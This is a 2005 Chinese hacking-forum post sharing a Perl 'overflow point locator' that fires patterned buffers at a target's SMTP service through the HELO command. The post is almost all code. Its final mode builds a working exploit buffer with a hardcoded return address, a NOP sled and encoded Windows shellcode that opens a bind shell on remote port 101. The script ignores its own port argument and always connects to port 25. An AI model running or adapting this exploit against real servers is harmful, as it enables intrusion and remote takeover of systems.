打印

[原创]溢出点定位工具

stealthwalker

技术核心组

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 529
精华: 82
积分: 6504
阅读权限: 200
在线时间: 393 小时
注册时间: 2004-12-6
最后登录: 2008-8-22

原创技术奖核心建议奖优秀管理奖软件研发奖

发短消息
加为好友
当前离线

楼主大中小发表于 2005-8-1 18:45 只看该作者

[原创]溢出点定位工具

文章作者：无敌最寂寞 [E.S.T]（孟方明 -273℃）
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

附带在《菜鸟溢出手册》里的，感觉也许对某些朋友能有用我就贴出来了：

引用:

#!/usr/bin/perl
#溢出点定位工具 by 孟方明[-273℃]

$|=1;

use IO::Socket;

my $str="111122223333444455556666777788889999";
my $buff;
my %opts;
if($#ARGV<1)
{
&usage;
}
#exit(0);
my $host=$ARGV[0] || die "you must specified the target with ip address!\n";
my $port=$ARGV[1] || die "you must specified target port\n";
my $times=$ARGV[2] || die "you must specify the repeate times!\n";
my $rep1=$ARGV[3] ;
my $rep2=$ARGV[4];
my $rep3=$ARGV[5];
my $ret=$ARGV[6] || 0;
my $loc=$ARGV[7]|| 0;
my $adds=$ARGV[8] ||0;
my $pr=$ARGV[9] || 0;
if (lc($pr) eq 'p')
{print "\t  the buffer to filled are below:\n";
print '#' x 80,"\n\n";
print &cvt($str,$times,$adds,$rep1,$rep2,$rep3);
print "\n",'#' x 80,"\n\n";
my $len=length(&cvt($str,$times,$adds,$rep1,$rep2,$rep3));
print "the length of the buffer is $len\n";
exit(0);
}
if($rep1==0&&$rep2==0&&$rep3==0)
{
print "[+]Now trying $times times chars to fill the buffer!\n";
&attack(&first($str,$times),$host,$port);
return;
}
if($ret!=0 && $loc!=0)
{
print "[+]Now making shellcode with ret specified!\n";
sleep 2;
$buff=&mkshell(&cvt($str,$times,$rep1,$rep2,$rep3),$ret,$loc);
print "[+]Now attack with produced shellcode!\n";
&attack($buff,$host,$port);
print "[+]Done!!Check your shell on remote port 101!\n";
return;
}
  print "[+]Now producing wanted buffer!\n";
  $buff=&cvt($str,$times,$rep1,$rep2,$rep3);
  sleep 2;
  print "[+] Now attack with produced buffer!\n";
  &attack($buff,$host,$port);
  print "[+]attack completed!\n";

  sub first
{ my ($str,$times)=@_;
my $buf='a';
$buf.=$str x $times;
return $buf;
}

sub cvt
{
my ($str,$times,$adds,$rep1,$rep2,$rep3)=@_;
$str.="\n";
my $buf;
if($adds!=0)
{$buf='a' x $adds;}
$buf.=$str x $times;
my $num=1;
my $n=1;
my $nn=1;
open(TEMP,">temp.txt");
print TEMP $buf;
undef($buf);
close TEMP;
open(TEMP,"<temp.txt");
my @buffer=<TEMP>;
close TEMP;
my $buf='a';
foreach(@buffer)
{  chomp($_);
s/[^$rep1]/a/g;
s/$rep1{4}/$num x 4/e;

if($_=~/$rep2/)
{
s/$rep2{4}/$n x 4/e;
$n++;
$n=1 if($n >9);

  if($_=~/$rep3/)
  {
  s/$rep3{4}/$nn x 4/e;
  $nn++;
  $nn=1 if ($nn > 9);
  }
  elsif($rep3!=0)
  {s/\d/a/g;}
}
  elsif($rep2!=0)
{s/\d/a/g;}
$num++;
$num=1 if ($num >9);
  $buf.=$_;
}
undef $buffer;
return $buf;
}

sub attack
{ my ($buf,$host,$port)=@_;
my $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>25,Proto=>'tcp');
$sock->autoflush(1);
my $res=<$sock>;
print $res,"\n";
print "buffer sent are:\n";
print $buf,"\n";
print "now sending...\n";
print $sock "HELO $buf\r\n";
$res=<$sock>;
print $res;
close $sock;
}

   sub mkshell
   {
   my ($buf,$ret,$subs)=@_;
   my $pos=index($buf,$subs);
   my $shell=substr($buf,0,$pos);
   $shell.="\x29\x4c\xdf\x77";
   $shell.="\x90" x 32;
my $shellcode="\xEB".
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF".
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D".
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9".
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C".
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89".
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03".
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F".
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88".
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61".
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9".
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C".
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8".
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68".
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F".
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23".
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89".
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9".
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77".
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77".
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77".
"\x58\x68\x61\x63\x6B\x90";
   $shell.=$shellcode;

   return $shell;
   }

   sub usage
   {
print<<"END";
               windows溢出点定位工具 by 孟方明[-273℃]
   usage:
      locate.pl <host> <port> <times> <adds> <rep1> <rep2> <rep3> <ret<loc>> [p]

   host======>目标主机IP地址（必选项）
   port======>目标端口（必选项）
   times=====>重复次数（必选项）
   adds======>需要后推多少个字符（1-3）没有填0
   rep1======>第一次替换数字（没有填0）
   rep2======>第二次替换数字（同上）
   rep3======>第三次替换数字（同上）
   ret=======>指定返回地址（默认填0）
   loc=======>指定最终产生的buffer的定位点（如果指定了ret，则此项必须指定且不能为0）
   p ========>是否打印出测试buffer来（只打印，但不攻击）

   说明：如有不理解的可以参看我在黑客X档案12期发表的《菜鸟也能写exploit》

   email:superlone@qq.com
   web:http://www.hackerxfiles.net
   home:[url]http://www.eviloctal.com[url]
END

exit(0)
}

当时为了配合稿子，所以写得很仓促难免有错误，还请大家多多指正了。

PS：有些代码还是用论坛的“[ QUOTE]”标签作为引用看得舒服，用“ [ CODE]”标签就那么一个小框框看上去好别扭的。

俺是mika！别叫错了！俺的QQ：794773 http://hi.baidu.com/stealthwalker/ my private area ------------------------------------------------------------ <a href=http://hi.baidu.com/stealthwalker target=_blank></a>